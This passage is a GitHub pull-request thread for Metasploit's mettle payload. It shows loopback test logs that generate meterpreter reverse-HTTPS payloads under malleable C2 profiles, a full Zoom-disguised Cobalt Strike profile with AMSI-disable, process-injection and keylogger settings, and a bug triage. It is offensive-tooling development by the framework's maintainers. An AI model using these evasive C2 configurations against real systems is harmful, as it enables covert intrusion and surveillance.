resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/reddit.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/reddit.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30792 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: l5y98u7v) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: l5y98u7v) Redirecting stageless: URI '/r/webdev/comments/95ltyr' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' -> UUID fUsk7ND0B3pn53LzDcjf3gPgYSh-YfOMp9eMvXjiQeYKLbDbuhI14CcvLPwVVZqkHt2i3mP_Yjkh8a9F3bLZ0lG7YSgFHgUPWDycoexSCGGDi67tRy58Ob7eU
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: l5y98u7v) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: l5y98u7v) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: l5y98u7v) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:59046) at 2026-06-15 10:30:50 +0200G

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

rtmp.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/rtmp.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/rtmp.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30404 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: ek812p7s) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: ek812p7s) Redirecting stageless: URI '/idle/1376547834/1' with UA 'Shockwave Flash' -> UUID eiqgIpe2QwGz-6bv2dQKSALdKT3SYUB4kLtWt_qetpfV7TnDobh5pAr_0AUEHilEZ76B1J
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: ek812p7s) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: ek812p7s) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: ek812p7s) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:51106) at 2026-06-15 10:37:09 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

slack.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/slack.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/slack.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30656 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: d8165p2o) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: d8165p2o) Redirecting stageless: URI '/messages/C0527B0NM' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID q-mvQ9FzEio8MikmVh2Gfwl-05aIbsVBlOjaXj7uenTL4uMS0QHzcJPKsMtcfrF4HzbL7JNmwHbFvnmQ0cpgTzfGIsjs7H4XJ4mJbJmty_SSOraRqHfV
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: d8165p2o) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: d8165p2o) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: d8165p2o) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:45922) at 2026-06-15 10:39:42 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

stackoverflow.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/stackoverflow.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/stackoverflow.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30736 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_https) > [*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: n5jz1yl8) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: n5jz1yl8) Redirecting stageless: URI '/questions/32251816/c-sharp-directives-compilation-error' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' -> UUID tp86lwRr1AdsDHkYBiPWqQlAdlOc_jNv
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: n5jz1yl8) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: n5jz1yl8) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: n5jz1yl8) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:46818) at 2026-06-15 10:41:10 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

trevor.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/trevor.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/trevor.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30648 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: mfpst8vn) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: mfpst8vn) Redirecting stageless: URI '/us/ky/louisville/312-s-fourth-st.html' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID 2ySWlXtTW9ysGLkMxjcW6wUqfUKpRrP4oAIcNLd7x8JwbuuCNPPn
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: mfpst8vn) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: mfpst8vn) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: mfpst8vn) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:51776) at 2026-06-15 10:42:29 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

youtube_video.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/youtube_video.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/youtube_video.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30608 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 01wvh2j7) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 01wvh2j7) Redirecting stageless: URI '/watch' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID CCF0XMvnhVdtZ3hzB0jWUw2RjBrOHmOQAvHS2e6LTkYs4qpyTSj6n8o1r6-KkqTCeHS5vERjeWBCLNpBYSQUdeBWf6h3oozjAG2bLB1Y3X5OmqfsDch
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 01wvh2j7) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 01wvh2j7) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 01wvh2j7) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:49532) at 2026-06-15 10:43:34 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
geComputer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

zoom.profile

broken

msutovsky-r7 · 2026-06-16T05:42:06Z

Hello @OJ, tested PHP and Python - PHP looks good, for Python, zoom.profile does not receive a session:

#zoom profile
#xx0hcd

###Global Options###
set sample_name "zoom.profile";

set sleeptime "38500";
set jitter    "27";
set useragent "Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16C104";
set data_jitter "50";

set host_stage "false";

###DNS options###
dns-beacon {
    # Options moved into 'dns-beacon' group in 4.3:
    set dns_idle             "8.8.8.8";
    set dns_max_txt          "220";
    set dns_sleep            "0";
    set dns_ttl              "1";
    set maxdns               "255";
    set dns_stager_prepend   ".wwwds.";
    set dns_stager_subhost   ".e2867.dsca.";
     
    # DNS subhost override options added in 4.3:
    set beacon               "d-bx.";
    set get_A                "d-1ax.";
    set get_AAAA             "d-4ax.";
    set get_TXT              "d-1tx.";
    set put_metadata         "d-1mx";
    set put_output           "d-1ox.";
    set ns_response          "zero";
}

###SMB options###
set pipename "ntsvcs##";
set pipename_stager "scerpc##";
set smb_frame_header "";

###TCP options###
set tcp_port "8000";
set tcp_frame_header "";

###SSH options###
set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
set ssh_pipename "SearchTextHarvester##";

###SSL Options###
#https-certificate {
#    set keystore "";
#    set password "";
#}

https-certificate {
    set C "US";
    set CN "whatever.com";
    set L "California";
    set O "whatever LLC.";
    set OU "local.org";
    set ST "CA";
    set validity "365";
}

#code-signer {
    #set keystore "your_keystore.jks";
    #set password "your_password";
    #set alias "server";
#}

###HTTP-Config Block###
http-config {
#    set headers "Server, Content-Type";
#    header "Content-Type" "text/html;charset=UTF-8";
#    header "Server" "nginx";
#
    set trust_x_forwarded_for "false";

    set block_useragents "curl*,lynx*,wget*";
}

#set headers_remove "image/x-xbitmap, image/pjpeg, application/vnd";

###HTTP-GET Block###
http-get {

    set uri "/s/58462514417 /wc/58462514417";
    
    client {

        #header "Host" "";
        header "Connection" "close";
        header "Sec-Fetch-Site" "same-origin";
        header "Sec-Fetch-Mode" "navigate";
        header "Sec-Fetch-User" "?1";
        header "Sec-Detch-Dest" "document";

	   
    metadata {
        base64;

        prepend "zm_gnl_guid=";
        header "Cookie";

    }

    }

    server {
    
        header "Content-Type" "text/html;charset=utf-8";
        header "Connection" "close";
        header "Server" "ZOOM";
        header "X-Robots-Tag" "noindex, nofollow";
        header "X-Content-Type-Options" "nosniff";
 
        output {

            base64;

            prepend "<!DOCTYPE html>";
            prepend "<html xmlns:fb=\"http://ogp.me/ns/fb#\">";
            prepend "<head prefix=\"og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#\">";
            prepend "<meta charset=\"utf-8\">";
            prepend "<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,Chrome=1\">";
            prepend "<meta name=\"viewport\" content=\"width=device-width,initial-scale=1,minimum-scale=1.0\">";
            prepend "<title>Launch Meeting - Zoom</title>";
            prepend "<meta name=\"keywords\" content=\"zoom, zoom.us, video conferencing, video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging\">";
            prepend "<meta name=\"description\" content=\"Zoom is the leader in modern enterprise video communications, with an easy, reliable cloud platform for video and audio conferencing, chat, and webinars across mobile, desktop, and room systems. Zoom Rooms is the original software-based conference room solution used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done. Zoom is a publicly traded company headquartered in San Jose, CA.\">";
            prepend "<meta name=\"robots\" content=\"noindex,nofollow\">";
            prepend "<meta property=\"og:type\" content=\"activity\">";
            prepend "<meta property=\"og:title\" content=\"Join our Cloud HD Video Meeting\">";
            prepend "<meta property=\"og:description\" content=\"Zoom is the leader in modern enterprise video communications, with an easy, reliable cloud platform for video and audio conferencing, chat, and webinars across mobile, desktop, and room systems. Zoom Rooms is the original software-based conference room solution used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done. Zoom is a publicly traded company headquartered in San Jose, CA.\">";
            prepend "<meta property=\"og:url\" content=\"https://us04web.zoom.us/s/74263599745\">";
            prepend "<meta property=\"og:site_name\" content=\"Zoom Video\">";
            prepend "<meta property=\"fb:app_id\" content=\"113289095462482\">";
            prepend "<meta property=\"twitter:account_id\" content=\"522701657\">";
            prepend "<script src=\"/lres\"></script>";
            prepend "<link rel=\"shortcut icon\" href=\"/zoom.ico\">";
            prepend "</head>";
            prepend "<body>";
            prepend "<script>";
            prepend "window.launchBase64 = ";
            
            append "\"\n";
            append "(function () {";
            append "var js = (JSON.parse(\"{\"js\":[\"launch-meeting/meeting.ed15e165e6bc2c070974.js\"],\"css\":[]}\").js || [])[0];";
            append "if (js) {";
            append "var domains = window.zoomDomains[0];";
            append "loadJS(domains[0], js);";
            append "var next = domains[1];";
            append "next && setTimeout(function() { !document.getElementById('zoom-ui-frame') && loadJS(next, js); }, 5000);";
            append "}";
            append "function loadJS(domain, url) {";
            append "var el = document.createElement('script');";
            append "var src = domain + \"/fe-static/\" + url;";
            append "el.setAttribute(\"src\", src);";
            append "document.body.appendChild(el);";
            append "}";
            append "})();";
            append "</script>\n";
            append "  <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=f022518e-a528-43eb-b7d9-6af79e1de3db\"> </script>";
            append "</body>";
            append "</html>";

            print;
        }
    }
}



###HTTP-Post Block###
http-post {
    
    set uri "/meeting/save";
    #set verb "GET";
    set verb "POST";

    client {

	#header "Host" "";
	header "Connection" "close";
	#header "Accept" "*/*";
	header "Sec-Fetch-Site" "same-origin";
        header "Sec-Fetch-Mode" "navigate";
        header "Sec-Detch-Dest" "document";
        
        output {
            base64url;
            prepend "zm_gnl_guid=";
	    header "Cookie";
        }

        id {
	    base64url;
            header "ZOOM-CSRFTOKEN";

        }
    }

    server {
    
        header "Content-Type" "text/html;charset=utf-8";
        header "Connection" "close";
        header "Server" "ZOOM";
        header "X-Robots-Tag" "noindex, nofollow";
        header "X-Content-Type-Options" "nosniff";

        output {
            netbios;	    
	   
	    prepend "    \"result\":\n";
	    prepend "    \"errorMessage\":null,\n";
	    prepend "    \"errorCode\":0,\n";
	    prepend "    \"status\":true,\n";
	    prepend "{\n";

	    append "}\n";

            print;
        }
    }
}



###HTTP-Stager Block###
http-stager {

    set uri_x86 "/Signin";
    set uri_x64 "/signin";

    client {
        
        #header "Host" "";
        header "Connection" "close";
        header "Sec-Fetch-Site" "same-origin";
        header "Sec-Fetch-Mode" "navigate";
        header "Sec-Fetch-User" "?1";
        header "Sec-Detch-Dest" "document";
    }

    server {
        
        header "Content-Type" "text/html;charset=utf-8";
        header "Connection" "close";
        header "Server" "ZOOM";
        header "X-Robots-Tag" "noindex, nofollow";
        header "X-Content-Type-Options" "nosniff";
	
	output {
	
	    prepend "content=";
	    
	    append "</script>\n";
	    print;
	}

    }
}


###Malleable PE/Stage Block###
stage {
    set checksum        "0";
    set compile_time    "12 Dec 2019 02:52:11";
    set entry_point     "170000";
    #set image_size_x86 "6586368";
    #set image_size_x64 "6586368";
    #set name	        "WWanMM.dll";
    set userwx 	        "false";
    set cleanup	        "true";
    set sleep_mask	"true";
    set stomppe	        "true";
    set obfuscate	"true";
    set rich_header     "";
    
    set sleep_mask "true";
    
    set smartinject "true";
    
    #set allocator "HeapAlloc";
    set magic_mz_x86 "MZRE";
    set magic_mz_x64 "MZAR";
    set magic_pe "EA";

    set module_x86 "wwanmm.dll";
    set module_x64 "wwanmm.dll";

    transform-x86 {
        prepend "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
        strrep "beacon.dll" "";
        }

    transform-x64 {
        prepend "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
        strrep "beacon.x64.dll" "";
        }

    #string "something";
    #data "something";
    #stringw "something"; 
}

###Process Inject Block###
process-inject {

    set allocator "NtMapViewOfSection";		

    set min_alloc "16700";

    set userwx "false";  
    
    set startrwx "true";
        
    transform-x86 {
        prepend "\x90\x90\x90";
    }
    transform-x64 {
        prepend "\x90\x90\x90";
    }

    execute {
        #CreateThread;
        #CreateRemoteThread;       

        CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";

        SetThreadContext;

        NtQueueApcThread-s;

        #NtQueueApcThread;

        CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";

        RtlCreateUserThread;
    }
}

###Post-Ex Block###
post-ex {

    set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
    set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";

    set obfuscate "true";

    set smartinject "true";

    set amsi_disable "true";
    
    set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
    set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
    set keylogger "SetWindowsHookEx";

}

OJ · 2026-06-16T08:22:33Z

@msutovsky-r7 thank you! I can see a few things in that zoom profile that aren't going to be supported (at least in the short term), such as dns-beacon so I will need to add those to the list of identifiers that are ignored. That's something that's MSF side, not mettle/python. I'll sort that now. Thanks.

jbx81-1337 · 2026-06-16T08:52:16Z

@msutovsky-r7 thank you! I can see a few things in that zoom profile that aren't going to be supported (at least in the short term), such as dns-beacon so I will need to add those to the list of identifiers that are ignored. That's something that's MSF side, not mettle/python. I'll sort that now. Thanks.

Hello OJ!

Current open issue I spotted:

slack profile doesn't work on mettle, sessions doesn't open
bingseaerch_getonly doesn't work on mettle, session doesn't open

(You can get them by the link I put on the start of the test plan)

I copied only the http-get and http-post section

Looks like the http server is Broken and the fetch payloads are not working anymore

~~microsoft_update profile doesn't work on java meterpreter~~ Java looks good

dledda-r7 · 2026-06-16T10:30:20Z

@OJ I have triged the issue with fetch payload. pretty simple fix to do:

file: lib/rex/proto/http/server.rb
line: 295
replace with: len = request.resource.length

root cause

The fetch payload adapter starts an HTTP server with 'MsfExploit' => self (the adapter itself) in the context.
When a client requests the fetch URL, dispatch_request is called.
find_resource_id is only defined in Msf::Handler::ReverseHttp — fetch payload adapters do NOT have this method.
So expl.respond_to?(:find_resource_id) returns false, and resource_id stays nil.
The first if branch is skipped (resource_id is nil).
The elsif resources[request.resource] branch matches (the fetch URI is registered as a resource).
BUG: Line 296 does len = resource_id.length — but resource_id is nil here!
This throws NoMethodError: undefined method 'length' for nil:NilClass, the exception propagates uncaught, the client connection is dropped with no HTTP response (blank).

A profile's `set uri` may list several space-separated candidate URIs (Cobalt Strike picks one at random per request), emitted as repeated TLV_TYPE_C2_URI values. c2_verb_config now holds a char **uris / uri_count instead of a single uri; parse_c2_verb_group iterates every TLV_TYPE_C2_URI via tlv_packet_iterate_str; build_profile_url picks one at random per request (rand() % uri_count); and c2_verb_config_free frees the array. This avoids emitting the raw "uri-a uri-b" string as a single request path. GET and POST both route through build_profile_url. Also add a `docker` Makefile target that builds mettle inside the rapid7/build:mettle container (no local toolchain/autotools required), overridable via DOCKER_TARGET=<triple> and defaulting to x86_64-linux-musl. Only the mettle checkout is mounted and build artifacts are chowned back to the invoking user.

OJ · 2026-06-16T13:02:10Z

@dledda-r7 thank you, I will make sure this gets rolled in on the next MSF push :)

dledda-r7 · 2026-06-18T13:14:45Z

Hello @OJ, is this : Handle multiple C2 URIs in mettle + add docker build target fix the issue with slack and bingsearch_getonly?

OJ added 8 commits March 25, 2026 08:48

First pass of TLV config block support

ea9cadd

Bring mettle up to speed with mc2, proxy and transport commands

a3d74d5

Avoid command line config block

19d860d

Add proper encoding and uri handling

47a4aed

Correctly encode UUIDs

e7c77fd

Move to STRING instead of RAW for UUID prefix/suffix

71b1f03

Support baked in extensions in stageless

b94e657

OJ mentioned this pull request May 20, 2026

Stageless PHP/Python/Java/Windows/Mettle with Malleable C2 profile support rapid7/metasploit-framework#21483

Open

OJ requested a review from smcintyre-r7 May 20, 2026 12:24

dledda-r7 self-assigned this Jun 3, 2026

dledda-r7 reviewed Jun 5, 2026

View reviewed changes

Comment thread mettle/src/c2_http.c Outdated

Comment thread mettle/src/c2_http.c Outdated

Comment thread mettle/src/c2_http.c

Comment thread mettle/src/main.c Outdated

Fix URI patching in non-MC2

c298cae

OJ added 4 commits June 9, 2026 19:27

Remove B64 length calc repetition

ac49cbd

Add size to mettle config block

ef89dda

Use unsigned char* instead of void*

d3cd2a0

Fix issues with b64 encoding and header management

8a12e91

Conversation

OJ commented May 20, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

dledda-r7 left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

dledda-r7 commented Jun 8, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

No Profile set

Datastore Options

Metasploit Output

Uh oh!

OJ commented Jun 8, 2026

Uh oh!

OJ commented Jun 8, 2026

Uh oh!

OJ commented Jun 8, 2026

Uh oh!

OJ commented Jun 8, 2026

Uh oh!

dledda-r7 commented Jun 9, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

OJ commented Jun 9, 2026

Uh oh!

OJ commented Jun 9, 2026

Uh oh!

dledda-r7 commented Jun 9, 2026

Uh oh!

OJ commented Jun 9, 2026

Uh oh!

dledda-r7 commented Jun 9, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

